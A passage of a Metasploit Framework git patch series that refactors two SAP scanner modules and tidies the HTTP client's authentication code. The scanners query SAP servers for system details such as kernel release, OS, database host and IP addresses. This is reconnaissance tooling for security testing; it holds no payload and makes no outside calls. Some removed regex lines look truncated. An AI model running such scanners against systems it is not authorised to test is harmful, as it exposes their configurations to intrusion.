.../scanner/sap/sap_icf_rfc_system_info.rb | 269 +++++------------ .../scanner/sap/sap_soap_rfc_system_info.rb | 273 +++++------------- 2 files changed, 143 insertions(+), 399 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb index 602d270cb6..6679e13e44 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -49,6 +49,27 @@ class Metasploit4 < Msf::Auxiliary ], self.class) end + def extract_field(data, elem) + if data =~ /<#{elem}>([^<]+)<\/#{elem}>/i + return $1 + end + nil + end + + def report_note_sap(type, data, value) + # create note + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data + # update saptbl for output + @saptbl << [ data, value ] + end + def run_host(ip) print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") @@ -58,6 +79,9 @@ class Metasploit4 < Msf::Auxiliary if res and res.code != 200 print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") return + elsif not res + print_error("[SAP] #{ip}:#{rport} - Server did not respond") + return end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect") @@ -66,7 +90,8 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - Response received") - saptbl = Msf::Ui::Console::Table.new( + # create table for output + @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", 'Prefix' => "\n", @@ -76,215 +101,59 @@ class Metasploit4 < Msf::Auxiliary "Key", "Value" ]) + response = res.body - rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i - rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i - rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i - rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i - rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i - rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i - rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i - rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i - rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i - rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i - rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i - rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i - rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i - rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i - rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i - rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i - rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i - saptbl << [ "Release Status of SAP System", rfcsaprl ] - saptbl << [ "RFC Log Version", rfcproto ] - saptbl << [ "Kernel Release", rfckernrl ] - saptbl << [ "Operating System", rfcopsys ] - saptbl << [ "Database Host", rfcdbhost] - saptbl << [ "Central Database System", rfcdbsys ] + # extract data from response body + rfcproto = extract_field(response, 'rfcproto') + rfcchartyp = extract_field(response, 'rfcchartyp') + rfcinttyp = extract_field(response, 'rfcinttyp') + rfcflotyp = extract_field(response, 'rfcflotyp') + rfcdest = extract_field(response, 'rfcdest') + rfchost = extract_field(response, 'rfchost') + rfcsysid = extract_field(response, 'rfcsysid') + rfcdbhost = extract_field(response, 'rfcdbhost') + rfcdbsys = extract_field(response, 'rfcdbsys') + rfcsaprl = extract_field(response, 'rfcsaprl') + rfcmach = extract_field(response, 'rfcmach') + rfcopsys = extract_field(response, 'rfcopsys') + rfctzone = extract_field(response, 'rfctzone') + rfcdayst = extract_field(response, 'rfcdayst') + rfcipaddr = extract_field(response, 'rfcipaddr') + rfckernrl = extract_field(response, 'rfckernrl') + rfcipv6addr = extract_field(response, 'rfcipv6addr') - if rfcinttyp == 'LIT' - saptbl << [ "Integer Format", "Little Endian" ] - else - saptbl << [ "Integer Format", "Big Endian" ] - end - saptbl << [ "Hostname", rfchost ] - - if rfcflotyp == 'IE3' - saptbl << [ "Float Type Format", "IEEE" ] - else - saptbl << [ "Float Type Format", "IBM/370" ] - end - - saptbl << [ "IPv4 Address", rfcipaddr ] - saptbl << [ "IPv6 Address", rfcipv6addr ] - saptbl << [ "System ID", rfcsysid ] - saptbl << [ "RFC Destination", rfcdest ] - saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] - saptbl << [ "Character Set", rfcchartyp ] - saptbl << [ "Daylight Saving Time", rfcdayst ] - saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] - # output table - print(saptbl.to_s) - - # report notes - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.release', - :data => "Release Status of SAP System: #{rfcsaprl}" - ) if not rfcsaprl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.rfc_log', - :data => "RFC Log Version: #{rfcproto}" - ) if not rfcproto.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.kernel', - :data => "Kernel Release: #{rfckernrl}" - ) if not rfckernrl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'system.os', - :data => "Operating System: #{rfcopsys}" - ) if not rfcopsys.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db.hostname', - :data => "Database Host: #{rfcdbhost}" - ) if not rfcdbhost.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db_system', - :data => "Central Database System: #{rfcdbsys}" - ) if not rfcdbsys.empty? + # report notes / create saptbl output + report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl + report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto + report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl + report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys + report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost + report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys + report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost + report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr + report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr + report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid + report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest + report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\s+/, "")) if rfctzone + report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp + report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst + report_note_sap('sap.machine_id','Machine ID: ',rfcmach.gsub(/\s+/,"")) if rfcmach if rfcinttyp == 'LIT' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Little Endian" - ) - elsif not rfcinttyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Big Endian" - ) + report_note_sap('system.endianness','Integer Format: ', 'Little Endian') + elsif rfcinttyp + report_note_sap('system.endianness','Integer Format: ', 'Big Endian') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.hostname', - :data => "Hostname: #{rfchost}" - ) if not rfchost.empty? - if rfcflotyp == 'IE3' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IEEE" - ) - elsif not rfcflotyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IBM/370" - ) + report_note_sap('system.float_type','Float Type Format: ', 'IEEE') + elsif rfcflotyp + report_note_sap('system.float_type','Float Type Format: ', 'IBM/370') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v4', - :data => "IPv4 Address: #{rfcipaddr}" - ) if not rfcipaddr.empty? + # output table + print(@saptbl.to_s) - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v6', - :data => "IPv6 Address: #{rfcipv6addr}" - ) if not rfcipv6addr.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.instance', - :data => "System ID: #{rfcsysid}" - ) if not rfcsysid.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.rfc.destination', - :data => "RFC Destination: #{rfcdest}" - ) if not rfcdest.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.timezone', - :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) if not rfctzone.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.charset', - :data => "Character Set: #{rfcchartyp}" - ) if not rfcchartyp.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.daylight_saving_time', - :data => "Daylight Saving Time: #{rfcdayst}" - ) if not rfcdayst.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.machine_id', - :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) if not rfcmach.empty? end end \ No newline at end of file diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 7676ad2611..808695293b 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -53,6 +53,27 @@ class Metasploit4 < Msf::Auxiliary ], self.class) end + def extract_field(data, elem) + if data =~ /<#{elem}>([^<]+)<\/#{elem}>/i + return $1 + end + nil + end + + def report_note_sap(type, data, value) + # create note + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data + # update saptbl for output + @saptbl << [ data, value ] + end + def run_host(ip) client = datastore['CLIENT'] data = '' @@ -86,227 +107,81 @@ class Metasploit4 < Msf::Auxiliary # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") return + elsif not res + print_error("[SAP] #{ip}:#{rport} - Server did not respond") + return end rescue ::Rex::ConnectionError print_error("[SAP] #{ip}:#{rport} - Unable to connect") return end - print_status("[SAP] #{ip}:#{rport} - got response") - saptbl = Msf::Ui::Console::Table.new( + + print_status("[SAP] #{ip}:#{rport} - Response received") + + # create table for output + @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] System Info", + 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, 'Columns' =>[ - "Info", + "Key", "Value" ]) + response = res.body - rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i - rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i - rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i - rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i - rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i - rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i - rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i - rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i - rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i - rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i - rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i - rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i - rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i - rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i - rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i - rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i - rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i - saptbl << [ "Release Status of SAP System", rfcsaprl ] - saptbl << [ "RFC Log Version", rfcproto ] - saptbl << [ "Kernel Release", rfckernrl ] - saptbl << [ "Operating System", rfcopsys ] - saptbl << [ "Database Host", rfcdbhost] - saptbl << [ "Central Database System", rfcdbsys ] - if rfcinttyp == 'LIT' - saptbl << [ "Integer Format", "Little Endian" ] - else - saptbl << [ "Integer Format", "Big Endian" ] - end - saptbl << [ "Hostname", rfchost ] - if rfcflotyp == 'IE3' - saptbl << [ "Float Type Format", "IEEE" ] - else - saptbl << [ "Float Type Format", "IBM/370" ] - end - saptbl << [ "IPv4 Address", rfcipaddr ] - saptbl << [ "IPv6 Address", rfcipv6addr ] - saptbl << [ "System ID", rfcsysid ] - saptbl << [ "RFC Destination", rfcdest ] - saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] - saptbl << [ "Character Set", rfcchartyp ] - saptbl << [ "Daylight Saving Time", rfcdayst ] - saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] - # output table - print(saptbl.to_s) - # report notes - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.release', - :data => "Release Status of SAP System: #{rfcsaprl}" - ) if not rfcsaprl.empty? + # extract data from response body + rfcproto = extract_field(response, 'rfcproto') + rfcchartyp = extract_field(response, 'rfcchartyp') + rfcinttyp = extract_field(response, 'rfcinttyp') + rfcflotyp = extract_field(response, 'rfcflotyp') + rfcdest = extract_field(response, 'rfcdest') + rfchost = extract_field(response, 'rfchost') + rfcsysid = extract_field(response, 'rfcsysid') + rfcdbhost = extract_field(response, 'rfcdbhost') + rfcdbsys = extract_field(response, 'rfcdbsys') + rfcsaprl = extract_field(response, 'rfcsaprl') + rfcmach = extract_field(response, 'rfcmach') + rfcopsys = extract_field(response, 'rfcopsys') + rfctzone = extract_field(response, 'rfctzone') + rfcdayst = extract_field(response, 'rfcdayst') + rfcipaddr = extract_field(response, 'rfcipaddr') + rfckernrl = extract_field(response, 'rfckernrl') + rfcipv6addr = extract_field(response, 'rfcipv6addr') - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.rfc_log', - :data => "RFC Log Version: #{rfcproto}" - ) if not rfcproto.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'sap.version.kernel', - :data => "Kernel Release: #{rfckernrl}" - ) if not rfckernrl.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :sname => 'sap', - :type => 'system.os', - :data => "Operating System: #{rfcopsys}" - ) if not rfcopsys.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db.hostname', - :data => "Database Host: #{rfcdbhost}" - ) if not rfcdbhost.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.db_system', - :data => "Central Database System: #{rfcdbsys}" - ) if not rfcdbsys.empty? + # report notes / create saptbl output + report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl + report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto + report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl + report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys + report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost + report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys + report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost + report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr + report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr + report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid + report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest + report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\s+/, "")) if rfctzone + report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp + report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst + report_note_sap('sap.machine_id','Machine ID: ',rfcmach.gsub(/\s+/,"")) if rfcmach if rfcinttyp == 'LIT' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Little Endian" - ) - elsif not rfcinttyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.endianness', - :data => "Integer Format: Big Endian" - ) + report_note_sap('system.endianness','Integer Format: ', 'Little Endian') + elsif rfcinttyp + report_note_sap('system.endianness','Integer Format: ', 'Big Endian') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.hostname', - :data => "Hostname: #{rfchost}" - ) if not rfchost.empty? - if rfcflotyp == 'IE3' - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IEEE" - ) - elsif not rfcflotyp.empty? - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.float_type', - :data => "Float Type Format: IBM/370" - ) + report_note_sap('system.float_type','Float Type Format: ', 'IEEE') + elsif rfcflotyp + report_note_sap('system.float_type','Float Type Format: ', 'IBM/370') end - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v4', - :data => "IPv4 Address: #{rfcipaddr}" - ) if not rfcipaddr.empty? + # output table + print(@saptbl.to_s) - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.ip.v6', - :data => "IPv6 Address: #{rfcipv6addr}" - ) if not rfcipv6addr.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.instance', - :data => "System ID: #{rfcsysid}" - ) if not rfcsysid.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.rfc.destination', - :data => "RFC Destination: #{rfcdest}" - ) if not rfcdest.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.timezone', - :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" - ) if not rfctzone.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'system.charset', - :data => "Character Set: #{rfcchartyp}" - ) if not rfcchartyp.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.daylight_saving_time', - :data => "Daylight Saving Time: #{rfcdayst}" - ) if not rfcdayst.empty? - - report_note( - :host => ip, - :proto => 'tcp', - :port => rport, - :type => 'sap.machine_id', - :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" - ) if not rfcmach.empty? end end From f3cf8ad1b9e72a1e63d10d83bc1f5b8ca6e7b3aa Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:13:33 +0100 Subject: [PATCH 024/139] Whitespace EOL --- modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb | 2 +- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb index 6679e13e44..ad808d5c43 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -62,7 +62,7 @@ class Metasploit4 < Msf::Auxiliary :host => rhost, :port => rport, :proto => 'tcp', - :sname => 'sap', + :sname => 'sap', :type => type, :data => data + value ) if data diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 808695293b..7bece972d3 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Auxiliary :host => rhost, :port => rport, :proto => 'tcp', - :sname => 'sap', + :sname => 'sap', :type => type, :data => data + value ) if data From 358b2f578380ffc011b0661bf0ec43243a2cf52a Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:15:04 +0100 Subject: [PATCH 025/139] Added module credit as this has turned into a rewrite ;) --- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 7bece972d3..8408a4ae1d 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -40,7 +40,8 @@ class Metasploit4 < Msf::Auxiliary 'Author' => [ 'Agnivesh Sathasivam', - 'nmonkee' + 'nmonkee', + 'ChrisJohnRiley' # module cleanup / streamlining ], 'License' => MSF_LICENSE ) From d49797267e2f068f68a63c51c47370165570070c Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 19 Feb 2013 11:20:49 +0100 Subject: [PATCH 026/139] Correct SAP Table Name --- modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 8408a4ae1d..1ec8aee729 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -122,7 +122,7 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", + 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, From 0662677a72a2223eb295550cd6022e52436658f3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 17:19:16 -0600 Subject: [PATCH 027/139] First minor cleanup sweep --- lib/rex/proto/http/client.rb | 80 +++++++++++++--------------- lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 38 insertions(+), 44 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0244a9eb3e..13d36d91c0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,27 +169,28 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = false - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + + opts['cgi'] = false + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end @@ -205,24 +206,25 @@ class Client # # @return [Request] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = true - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + + opts['cgi'] = true + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -234,7 +236,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end # @@ -396,7 +398,6 @@ class Client # We do persist the rest of the connection stream because Digest is a tcp session # based authentication method. # - def digest_auth(opts={}) @nonce_count = 0 @@ -753,13 +754,6 @@ class Client pipeline end - # - # Return the Authorization basic-auth header - # - def set_basic_auth_header(auth) - auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" - end - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c24d9a8c4a..8af865bde1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,7 +34,7 @@ class ClientRequest attr_reader :opts - def initialize(opts={}, client_config) + def initialize(client_config,opts={}) @cgi = opts['cgi'] @config = client_config @connection = opts['connection'] From a4905e43a2ebcabf8d8f3ef82f9964c09797a4c8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:40:39 -0600 Subject: [PATCH 028/139] Fix the way creds are passed + YARD some ayrddocs on send_auth plus fix the wierd way i was passing creds around --- lib/rex/proto/http/client.rb | 36 +++++++++++++++++------------------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 13d36d91c0..66a4780618 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -319,6 +319,7 @@ class Client # # @param req [Request,#to_s] The request to send # @param t (see #connect) + # def send_request(req, t = -1) connect(t) conn.put(req.to_s) @@ -329,31 +330,29 @@ class Client !(self.username.nil?) && self.username != '' end - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. + # Resends an HTTP Request with the propper authentcation headers + # set. If we do not support the authentication type the server requires + # we return the original response object + # @param res [Response] the HTTP Response object + # @param opts [Hash] the options used to generate the original HTTP request + # @param t [Fixnum] the timeout for the request in seconds + # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) + opts['username'] ||= self.username + opts['password'] ||= self.password supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + opts['headers']['Authorization'] = basic_auth_header(username,password) else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} end req = request_cgi(opts) res = _send_recv(req,t,persist) return res elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s temp_response = digest_auth(opts) if temp_response.kind_of? Rex::Proto::Http::Response res = temp_response @@ -403,8 +402,8 @@ class Client to = opts['timeout'] || 20 - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" + digest_user = opts['username'] || "" + digest_password = opts['password'] || "" method = opts['method'] path = opts['uri'] @@ -539,7 +538,6 @@ class Client # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -550,8 +548,8 @@ class Client } to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s + opts['username'] ||= '' + opts['password'] ||= '' if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " From de4234f0adfe877ede4d7d816f21ece5e6004cb8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 